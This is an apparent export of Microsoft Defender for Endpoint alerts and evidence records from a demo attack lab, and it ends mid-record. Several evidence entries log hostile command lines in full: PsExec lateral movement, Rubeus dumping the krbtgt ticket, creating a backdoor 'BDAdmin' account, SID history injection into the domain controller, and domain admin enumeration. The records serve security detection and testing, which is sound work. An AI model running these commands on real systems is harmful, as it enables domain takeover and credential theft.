"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:34:57.14Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:32:59.3843671Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 8476,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"dir \\\\msdxv2-dc\\\\c$\"",
"processCreationTime": "2022-11-21T02:33:00.0799417Z",
"processId": 9412,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:34:57.3066667Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:32:59.3843671Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 8476,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-11-21T02:33:21.3508181Z",
"processId": 6804,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:34:57.88Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:33:53.9354868Z",
"processId": 8232,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045931511124826_-2037955442 | 72e5ed84-28b4-4e06-b94e-0fc890c34332 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:05:51.1125047Z | 2022-11-21T02:07:53.5833333Z | null | 2022-11-21T01:55:47.8840459Z | 2022-11-21T02:02:27.3917772Z | Suspicious System Owner/User Discovery | A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks. | Discovery | New | Low | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | 9bfe28a9-21eb-4f8a-b51e-38ebd3650c88 | null | null | null | [
"T1033",
"T1059.001",
"T1087.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "None",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:05:51.15Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001152861366417_-1419039804 | 75bb465a-1c46-44d4-8b7b-99d10c673632 | 486 | MicrosoftDefenderForEndpoint | 2022-09-30T06:14:46.1366594Z | 2022-11-19T01:35:42.7033333Z | 2022-10-01T01:36:00.5066667Z | 2022-09-30T06:12:00.7230377Z | 2022-09-30T06:12:00.7230377Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Low",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:14:46.2833333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:14:46.2833333Z",
"fileName": "Get-KRBTicket.ps1",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "61a4a69fc19221b9abcb65a3be09ed3c041d1c42",
"sha256": "3a4ae2a05b8f4cefcad48134573194239d2c1583d5f4d92d295aca7d4120a402",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:04:30.4666667Z | Suspicious | None | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 5,760 | ping 127.0.0.1 | 2022-11-21T02:02:27.7361869Z | 620 | 2022-11-16T03:32:19.0279725Z | services.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
da638045949606814719_674643635 | 7b6e8ba0-10d6-4e4c-b1d3-b267e32c6178 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:36:00.681497Z | 2022-11-21T02:45:44.2033333Z | 2022-11-21T02:45:44.0637808Z | 2022-11-21T02:34:27.6530419Z | 2022-11-21T02:34:27.6530419Z | SID history injection | A Security IDentifcation (SID) history injection was detected on this device. SID history is an attribute that supports migration scenarios. Attackers typically use attack tools to change the SID history of an existing domain user to an SID with elevated privileges. With elevated privileges, the affected process might be able to access sensitive files, ensure persistence, and modify system settings. | PrivilegeEscalation | Resolved | Medium | 52 | Benign | null | null | WindowsDefenderAtp | f9448527-19db-4a4d-90e7-e9279c3e77b9 | null | Barium | null | [
"T1134.005"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Defender",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
}
] | [
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:36:00.7266667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:36:00.7266667Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:36:00.7266667Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:34:15.4789089Z",
"parentProcessFileName": "cmd.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 4960,
"processCommandLine": "powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" ",
"processCreationTime": "2022-11-21T02:34:25.8338465Z",
"processId": 5168,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:03:45.04Z | Suspicious | Active | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 4f4970c3545972fea2bc1984d597fc810e6321e0 | 25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369 | net.exe | C:\Windows\System32 | 1,768 | "net.exe" user /domain | 2022-11-21T02:01:37.7396253Z | 11,068 | 2022-11-21T02:01:28.4753286Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:04:30.4666667Z | Suspicious | None | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 5,760 | ipconfig | 2022-11-21T02:02:27.7361869Z | 620 | 2022-11-16T03:32:19.0279725Z | services.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
da638072957044260847_1680122725 | 7db6d4ed-b9d0-469b-8d42-5a207d28b45c | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:48:24.4261035Z | 2022-12-22T08:50:38.6933333Z | null | 2022-12-22T08:47:23.1319863Z | 2022-12-22T08:47:23.7158614Z | Anomalous account lookups | An anomalous chain of attempts to look up user account information has been observed. An attacker might be gathering information about potential targets. | Discovery | New | Low | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | ad0494b0-6cfa-4ba2-9285-706fd414acd8 | null | null | null | [
"T1033",
"T1069.001",
"T1069.002",
"T1087",
"T1087.001",
"T1087.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:48:24.5933333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:24.5933333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain",
"processCreationTime": "2022-12-22T08:47:23.149947Z",
"processId": 9268,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:24.5933333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain",
"processCreationTime": "2022-12-22T08:47:23.2090769Z",
"processId": 1912,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:24.5933333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"net.exe\" user ronhd /domain",
"processCreationTime": "2022-12-22T08:47:23.4848781Z",
"processId": 5452,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:24.5933333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"net.exe\" user /domain",
"processCreationTime": "2022-12-22T08:47:23.0252128Z",
"processId": 9092,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:24.5933333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-12-22T08:47:23.1029019Z",
"processId": 2936,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:24.5933333Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:26:24.0772409Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 1896,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Desktop'",
"processCreationTime": "2022-12-22T08:47:11.8139068Z",
"processId": 6324,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:03:45.04Z | Suspicious | Active | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 4f4970c3545972fea2bc1984d597fc810e6321e0 | 25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369 | net.exe | C:\Windows\System32 | 1,768 | ping 127.0.0.1 | 2022-11-21T02:01:37.7396253Z | 11,068 | 2022-11-21T02:01:28.4753286Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
da638045930195076938_-1427452130 | 1825f748-eaa9-475d-af74-88e39dcdf26d | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:03:39.5077156Z | 2022-11-26T01:35:43.17Z | 2022-11-26T01:35:43.0633333Z | 2022-11-21T02:01:38.5208087Z | 2022-11-21T02:32:54.3897964Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Low",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:03:39.9733333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:03:39.9733333Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
